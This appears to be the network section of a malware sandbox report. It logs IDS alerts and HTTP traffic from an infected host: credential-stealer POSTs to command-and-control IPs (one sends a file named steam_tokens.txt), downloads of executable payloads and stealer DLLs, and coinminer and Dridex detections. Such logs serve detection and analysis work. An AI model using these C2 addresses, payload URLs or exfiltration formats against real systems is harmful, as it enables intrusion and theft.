34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="file"------AKEGDHJDHDAFHJJKJEHC--
                        Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEHDAFHDHCBFIDGCFIDHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 2d 2d 0d 0a Data Ascii: ------HIEHDAFHDHCBFIDGCFIDContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------HIEHDAFHDHCBFIDGCFIDContent-Disposition: form-data; name="message"ybncbhylepme------HIEHDAFHDHCBFIDGCFID--
                        Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJEHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AAKJEGCFBGDHJJJJJKJE--
                        Source: unknownDNS query: name: api64.ipify.org
                        Source: unknownDNS query: name: ipinfo.io
                        Source: unknownDNS query: name: iplogger.org
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49712 -> 176.113.115.33:80
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49710 -> 103.130.147.211:80
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49709 -> 147.45.44.104:80
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49708 -> 147.45.44.104:80
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49719 -> 176.111.174.109:80
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49741 -> 46.8.231.109:80
                        Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.9:54235 -> 1.1.1.1:53
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49766 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49769 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49762 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49761 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49763 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49765 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49772 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49773 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49775 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49777 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49778 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49779 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49780 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49781 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49789 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49782 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49784 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49790 -> 147.45.44.104:80
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49785 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49786 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49788 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49791 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49806 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49792 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49798 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49800 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49805 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49802 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49799 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49804 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49808 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49807 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49768 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49774 -> 116.203.165.127:443
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49726 -> 162.241.61.218:443
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49727 -> 162.241.61.218:443
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49730 -> 162.241.61.218:443
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49723 -> 185.166.143.50:443
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49754 -> 162.241.61.218:443
                        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
                        Source: global trafficHTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
                        Source: global trafficHTTP traffic detected: GET /kcatelin/jameson/downloads/easyfirewall.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: bitbucket.orgCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vsfdhgg15.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sdhsfd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /bbfbfb0f-4597-4ff3-b025-124f61baf271/downloads/7f30c6a5-e68f-46b2-82dc-be29f7fa498f/easyfirewall.exe?response-content-disposition=attachment%3B%20filename%3D%22easyfirewall.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGNWBPVIG&Signature=RG7gLpLQM9DgrtzKECr%2F5hgaEBw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEFQaCXVzLWVhc3QtMSJHMEUCIQDFdamkZ04A05ya5JjE%2BO96KfXxuSlOnxf1KU2WbhcgUAIgZVAiwI6sPTiv1NV5OPTMgcBSTcThYLQvzmHVuZLepfEqsAIIjf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEWlad7oE1ErA4%2BxniqEAkPBXDxCFRBvIDaMXH7btuCQePvBHv56Z32PJd%2BrgVAazFvcT%2BdKnWonvbgD%2Bl83gjxQvJNinimAUee0zl9An1zjHrdCynGOjIYCd10WgZZ37gvIdBvOekdVSJQN4VvROptCwbViUPgEar%2FvniBV%2B9dqfZdJIelwOng6Fln8TYeg%2Fl7wUG0nZY4e%2FMaCUav1Yku%2FrJGpCSh4n1nCWTKS7G8gb01L5gOI8TnzTwcjXoM61eavAdUsF%2FtJR2uJ0%2BlBHAgp11FQKPWY6BApQnVnlTsKXD%2Fzo4xyODNargGwFCcO8KVN97GtOSH0yfnXUN2LEsVwXZ144uxzDcaZqLaCMuxhFmrDMODaurcGOp0BK2eIjmGLV4b2uwA8kI4vRD9zrjU%2BmUC3l1cVxad27xvHP82pnJ2i1cZxwMDbzFINMt0y8GSW3msaumnuqBQuixm4zhYMg6rT6MFqZP28%2B%2FJuSlZgb%2BkDseti8cbPYao%2FN7WkgFVWx54F%2F7M1c4sTBsc%2F5%2BvRyyOUVbpkc1t71ns4lfqSh3BTkvYEoJGMd0wh2U5uz5SUmMFeE%2FwfYQ%3D%3D&Expires=1726919784 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /vfsdgdf.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCGIIEHIEGDGDGCAEBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDHJKKJDHJJJJKEGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJKEBKFCAAECAAAAAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 8061Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIEGHJEGIDGCAFBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAEHCFHJJJJECAAFBKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKJKEHIJECGCBFIJEGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 122469Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHDAEBGCAAFIDGCGDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHCGCGCFHIDBFHIIJKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 7945Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /api/wp-ping.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 41.216.188.190
                        Source: global trafficHTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 41.216.188.190
                        Source: global trafficHTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 41.216.188.190
                        Source: global trafficHTTP traffic detected: HEAD /prog/66e705d09b33c_jack.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: HEAD /Files/1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: HEAD /yuop/66edb89bc4073_crypted.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: HEAD /kurwa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: HEAD /thebig/noode.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.113.115.33Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /Files/1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: HEAD /lopsa/66ebb3bf78bd6_Send.exe#111us300 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
